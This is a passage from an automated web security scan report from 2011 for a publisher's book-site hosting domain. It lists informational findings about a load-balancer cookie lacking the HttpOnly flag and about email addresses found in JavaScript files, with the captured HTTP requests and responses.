       var date = new Date();
       date.setTime(date.getTime()+(days*24*60*60*1000));
       var expires = "; expires="+date.toGMTString();
   }
   else var expi
...[SNIP]...

4.28. http://hosting.kicknetwork.com/afterdark/js/cufon-yui.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/js/cufon-yui.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/js/cufon-yui.js HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:25:36 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:31 GMT
ETag: "68cec1-4751-497f3f048e9c0"
Accept-Ranges: bytes
Content-Length: 18257
Content-Type: application/x-javascript
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

/*
* Copyright (c) 2009 Simo Kinnunen.
* Licensed under the MIT license.
*
* @version 1.09
*/
var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(fu
...[SNIP]...

4.29. http://hosting.kicknetwork.com/afterdark/js/font-replace.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/js/font-replace.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/js/font-replace.js HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:25:53 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:32 GMT
ETag: "68ceb7-14e-497f3f0582c00"
Accept-Ranges: bytes
Content-Length: 334
Content-Type: application/x-javascript
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

$j(document).ready(function() {
   Cufon.now();

   if(Ka.Info.PAGE != 'pages/kickPlaceServerSide.jsp') {
   Cufon.replace('#wrapper h3').replace('#ka_profileContainer #ka_profileUser h5').replace('#
...[SNIP]...

4.30. http://hosting.kicknetwork.com/afterdark/js/jquery.colorbox-min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/js/jquery.colorbox-min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=35a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/js/jquery.colorbox-min.js HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:25:43 GMT
Server: Apache/2.2.8 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:32 GMT
ETag: "3179833-21fc-497f3f0582c00"
Accept-Ranges: bytes
Content-Length: 8700
Content-Type: application/x-javascript
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=35a4a8c000005000; Path=/; Max-age=1800

/* ColorBox v1.3.5 - a full featured, light-weight, customizable lightbox based on jQuery 1.3 */
(function(c){function r(b,d){d=d==="x"?m.width():m.height();return typeof b==="string"?Math.round(b.mat
...[SNIP]...

4.31. http://hosting.kicknetwork.com/afterdark/js/jquery.colorbox.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/js/jquery.colorbox.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=35a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/js/jquery.colorbox.css HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:25:43 GMT
Server: Apache/2.2.8 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:32 GMT
ETag: "3179834-1727-497f3f0582c00"
Accept-Ranges: bytes
Content-Length: 5927
Content-Type: text/css
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=35a4a8c000005000; Path=/; Max-age=1800

/*
ColorBox Core Style
The following rules are the styles that are consistant between themes.
Avoid changing this area to maintain compatability with future versions of ColorBox.
*/
#
...[SNIP]...

4.32. http://hosting.kicknetwork.com/afterdark/js/jquery.form.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/js/jquery.form.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=35a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/js/jquery.form.js HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:25:43 GMT
Server: Apache/2.2.8 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:32 GMT
ETag: "3179835-5a53-497f3f0582c00"
Accept-Ranges: bytes
Content-Length: 23123
Content-Type: application/x-javascript
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=35a4a8c000005000; Path=/; Max-age=1800

/*
* jQuery Form Plugin
* version: 2.25 (08-APR-2009)
* @requires jQuery v1.2.2 or later
*
* Examples and documentation at: http://malsup.com/jquery/form/
* Dual licensed under the MIT and
...[SNIP]...

4.33. http://hosting.kicknetwork.com/afterdark/js/jquery.metadata.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/js/jquery.metadata.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=35a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/js/jquery.metadata.min.js HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:25:43 GMT
Server: Apache/2.2.8 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:32 GMT
ETag: "3179836-50c-497f3f0582c00"
Accept-Ranges: bytes
Content-Length: 1292
Content-Type: application/x-javascript
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=35a4a8c000005000; Path=/; Max-age=1800

/*
* Metadata - jQuery plugin for parsing metadata from elements
*
* Copyright (c) 2006 John Resig, Yehuda Katz, J.....rn Zaefferer, Paul McLanahan
*
* Dual licensed under the MIT and GPL license
...[SNIP]...

4.34. http://hosting.kicknetwork.com/afterdark/js/jquery.rating.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/js/jquery.rating.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/js/jquery.rating.css HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:25:43 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:31 GMT
ETag: "68ceb9-344-497f3f048e9c0"
Accept-Ranges: bytes
Content-Length: 836
Content-Type: text/css
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

/* jQuery.Rating Plugin CSS - http://www.fyneworks.com/jquery/star-rating/ */
div.rating-cancel,div.star-rating{float:left;width:17px;height:15px;text-indent:-999em;cursor:pointer;display:block;backg
...[SNIP]...

4.35. http://hosting.kicknetwork.com/afterdark/js/jquery.rating.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/js/jquery.rating.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/js/jquery.rating.js HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:25:36 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:32 GMT
ETag: "68ceb8-fdb-497f3f0582c00"
Accept-Ranges: bytes
Content-Length: 4059
Content-Type: application/x-javascript
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

/*
### jQuery Star Rating Plugin v3.12 - 2009-04-16 ###
* Home: http://www.fyneworks.com/jquery/star-rating/
* Code: http://code.google.com/p/jquery-star-rating-plugin/
*
* Dual licensed under th
...[SNIP]...

4.36. http://hosting.kicknetwork.com/afterdark/js/ka_afterdark.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/js/ka_afterdark.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/js/ka_afterdark.js HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:25:53 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:32 GMT
ETag: "68ceb6-10238-497f3f0582c00"
Accept-Ranges: bytes
Content-Length: 66104
Content-Type: application/x-javascript
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

$j(document).ready(function() {
   //add comment
   if (window.location.href.indexOf("&param=genrehistorical") != -1) {
       $j('#wrapper').prepend('<div class="genreBanner"><img src="'+customCode+'images/th
...[SNIP]...

4.37. http://hosting.kicknetwork.com/afterdark/js/ka_afterdark_facebook.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/js/ka_afterdark_facebook.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/js/ka_afterdark_facebook.js HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:25:53 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Tue, 04 Jan 2011 23:30:55 GMT
ETag: "68d046-106e-4990da8f389c0"
Accept-Ranges: bytes
Content-Length: 4206
Content-Type: application/x-javascript
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

Ka.FacebookConnect.init(
   {
       apiKey: '6e36d235a603a399bcb04dd8466b605c',
       buttonHtml: '<p><img src="http://static.ak.fbcdn.net/images/icons/favicon.gif" /> <input class="ka_fb_connect ka_b
...[SNIP]...

4.38. http://hosting.kicknetwork.com/afterdark/js/ka_romance.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/js/ka_romance.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=35a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.39. http://hosting.kicknetwork.com/afterdark/js/legal_pages.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/js/legal_pages.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/js/legal_pages.js HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000

Response

4.40. http://hosting.kicknetwork.com/afterdark/polldaddy.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/polldaddy.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.41. http://hosting.kicknetwork.com/afterdark/smoothmenu/ddsmoothmenu-v.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/smoothmenu/ddsmoothmenu-v.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/smoothmenu/ddsmoothmenu-v.css HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:25:45 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:31 GMT
ETag: "694b41-4fa-497f3f048e9c0"
Accept-Ranges: bytes
Content-Length: 1274
Content-Type: text/css
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

.ddsmoothmenu-v ul{
margin: 0;
padding: 0;
width: 170px; /* Main Menu Item widths */
list-style-type: none;
font: bold 12px Verdana;

border-bottom: 1px solid #ccc;
}

.ddsmoothmenu-v ul li
...[SNIP]...

4.42. http://hosting.kicknetwork.com/afterdark/smoothmenu/ddsmoothmenu.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/smoothmenu/ddsmoothmenu.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/smoothmenu/ddsmoothmenu.css HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:25:44 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:31 GMT
ETag: "694b42-8a4-497f3f048e9c0"
Accept-Ranges: bytes
Content-Length: 2212
Content-Type: text/css
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

.ddsmoothmenu{
/*
font: bold 12px Verdana;
background: #414141; /*background of menu bar (default state)*/
width: 100%;
}

.ddsmoothmenu ul{
z-index: 1000;
margin: 0;
padding: 0;
list-style-type: none
...[SNIP]...

4.43. http://hosting.kicknetwork.com/afterdark/smoothmenu/ddsmoothmenu.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/smoothmenu/ddsmoothmenu.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/smoothmenu/ddsmoothmenu.js HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:25:45 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:31 GMT
ETag: "694b4b-1db5-497f3f048e9c0"
Accept-Ranges: bytes
Content-Length: 7605
Content-Type: application/x-javascript
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

//** Smooth Navigational Menu- By Dynamic Drive DHTML code library: http://www.dynamicdrive.com
//** Script Download/ instructions page: http://www.dynamicdrive.com/dynamicindex1/ddlevelsmenu/
//** Me
...[SNIP]...

4.44. http://hosting.kicknetwork.com/afterdark/utils/featuredBookFeed.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/utils/featuredBookFeed.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/utils/featuredBookFeed.php?as=159176&type=One%20Night%20Stand HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://serve.a-widget.com/service/getWidgetSwf.kickAction
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:26:26 GMT
Server: Apache/2.2.14 (EL)
X-Powered-By: PHP/5.2.11
Content-Type: text/html; charset=UTF-8
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800
Content-Length: 8475

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:georss="http://www.georss.org/georss/"
...[SNIP]...

4.45. http://hosting.kicknetwork.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/crossdomain.xml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /crossdomain.xml HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://serve.a-widget.com/service/getWidgetSwf.kickAction
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:31:39 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Wed, 30 Jun 2010 13:35:27 GMT
ETag: "60d190-10b-48a3f6d3b05c0"
Accept-Ranges: bytes
Content-Length: 267
Content-Type: text/xml
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-head
...[SNIP]...

5. Email addresses disclosed previous next
There are 2 instances of this issue:

/afterdark/js/Champagne__Limousines_200-Champagne__Limousines_500-Champagne__Limousines_italic_200-Champagne__Limousines_italic_500.font.js
/afterdark/js/legal_pages.js

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

5.1. http://hosting.kicknetwork.com/afterdark/js/Champagne__Limousines_200-Champagne__Limousines_500-Champagne__Limousines_italic_200-Champagne__Limousines_italic_500.font.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/js/Champagne__Limousines_200-Champagne__Limousines_500-Champagne__Limousines_italic_200-Champagne__Limousines_italic_500.font.js

Issue detail

The following email address was disclosed in the response:

nymphont@yahoo.com

Request

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:25:36 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:32 GMT
ETag: "68cc02-fd82-497f3f0582c00"
Accept-Ranges: bytes
Content-Length: 64898
Content-Type: application/x-javascript
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

/*!
* The following copyright notice may not be removed under any circumstances.
*
* Copyright:
* . Lauren Thompson, 2009, 2010. All rights reserved.
*
* Description:
* A sweet little geometric sans-serif font that doesn't adhere to old rules.
*
* Designer:
* Lauren Thompson (nymphont@yahoo.com)
*/
Cufon.registerFont({"w":188,"face":{"font-family":"Champagne & Limousines","font-weight":200,"font-stretch":"normal","units-per-em":"360","panose-1":"2 11 2 2 2 2 2 2 2 4","ascent":"288","descent
...[SNIP]...
opyright:
* . Lauren Thompson, 2009, 2010. All rights reserved.
*
* Description:
* A sweet little geometric sans-serif font that doesn't adhere to old rules.
*
* Designer:
* Lauren Thompson (nymphont@yahoo.com)
*/
Cufon.registerFont({"w":193,"face":{"font-family":"Champagne & Limousines","font-weight":500,"font-stretch":"normal","units-per-em":"360","panose-1":"2 11 6 2 2 2 2 2 2 4","ascent":"288","descent
...[SNIP]...
opyright:
* . Lauren Thompson, 2009, 2010. All rights reserved.
*
* Description:
* A sweet little geometric sans-serif font that doesn't adhere to old rules.
*
* Designer:
* Lauren Thompson (nymphont@yahoo.com)
*/
Cufon.registerFont({"w":188,"face":{"font-family":"Champagne & Limousines","font-weight":200,"font-style":"italic","font-stretch":"normal","units-per-em":"360","panose-1":"2 11 2 2 2 2 2 9 2 4","
...[SNIP]...
opyright:
* . Lauren Thompson, 2009, 2010. All rights reserved.
*
* Description:
* A sweet little geometric sans-serif font that doesn't adhere to old rules.
*
* Designer:
* Lauren Thompson (nymphont@yahoo.com)
*/
Cufon.registerFont({"w":193,"face":{"font-family":"Champagne & Limousines","font-weight":500,"font-style":"italic","font-stretch":"normal","units-per-em":"360","panose-1":"2 11 6 2 2 2 2 9 2 4","
...[SNIP]...

5.2. http://hosting.kicknetwork.com/afterdark/js/legal_pages.js previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/js/legal_pages.js

Issue detail

The following email addresses were disclosed in the response:

infringments@simonandschuster.com
pocketafterdark@simonandschuster.com
privacyadministrator@simonandschuster.com

Request

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:25:53 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:32 GMT
